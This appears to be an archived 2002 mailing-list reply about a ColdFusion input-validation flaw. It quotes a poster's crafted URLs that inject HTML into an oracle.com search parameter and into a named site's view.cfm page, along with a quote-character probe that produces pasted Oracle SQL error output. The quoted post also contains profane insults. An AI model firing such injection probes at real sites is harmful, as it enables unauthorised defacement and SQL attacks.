Vulnerability Development mailing list archives

Re: Oracle Databases Allow HTML/SQL injection

From: Jim Kovalchuk <raxor () dexlink com>
Date: Tue, 16 Apr 2002 11:27:43 -0700 (PDT)


On Tue, 16 Apr 2002, david evlis reign wrote:


# oracle database madness"

"I only have a few things to say." - davidr

css in the oracle search engine -->

http://www.oracle.com/pls/use/use_query_html_v3.submit_query_input?p_adv_query_text=css<br><br><br><br><font%20color%20=%20red><h1>DAVID%20REIGN%20IN%20THE%20Y2K+2</H1></b><br><br><br><br><br><br>&p_origin=www&p_person_id=100582&p_community=oracle.com_v2&p_doc_location_array=Place+Holder&p_doc_location_array=document&p_location_array=&p_keyword_array=100017&p_value_array=www.oracle.com&p_date_begin=q_date&p_date_end=q_date&p_max_return=200

i get fucked up error messages from this:

Error generating ctx scoreORA-20000: interMedia Text error: DRG-10800: query 
failed: DRG-50921: EQUIV operand not a word or another EQUIV expression

and now, the oracle db, while my hacking was targetted at sql injection i 
found this:

Error Diagnostic Information
ODBC Error Code = S1000 (General error)
[INTERSOLV][ODBC Oracle driver][Oracle]ORA-01756: quoted string not properly 
terminated

The error occurred while processing an element with a general identifier of 
(CFQUERY), occupying document position (245:5) to (245:130).

Date/Time: Tue Apr 16 17:37:17 2002
Browser: Mozilla/4.0 (compatible; MSIE 5.01; Windows 3.1)
Remote Address: 64.66.85.22
Template: /content/www/prodn/bigpond/direct/view.cfm
Query String: ID='54 <-- HAHAH

with the url:

http://dsleerf.net/direct/view.cfm?ID='54

now, why i am laughing:

http://dsleerf.net/bigpond/direct/view.cfm?ID='54";><br><br><br><br><br><br><br><br><br><font%20color%20=%20red><h1>DAVID%20REIGN%20IN%20THE%20Y2K+2</H1></b><br><br><br><br><br><br>



This looks like an input validation bug in the Cold Fusion code, as i'm
quite sure Oracle doesn't use Cold Fusion for their web applications.

Macromedia's drag and drop IDE isn't security aware yet.


the oracle database is shit.
anyone who uses oracle is shit.
long live apple.

-davidr



_________________________________________________________________
Join the worlds largest e-mail service with MSN Hotmail. 
http://www.hotmail.com

Current thread:

Oracle Databases Allow HTML/SQL injection david evlis reign (Apr 16)
- Re: Oracle Databases Allow HTML/SQL injection KF (Apr 16)
- Re: Oracle Databases Allow HTML/SQL injection KF (Apr 16)
- Re: Oracle Databases Allow HTML/SQL injection Jim Kovalchuk (Apr 16)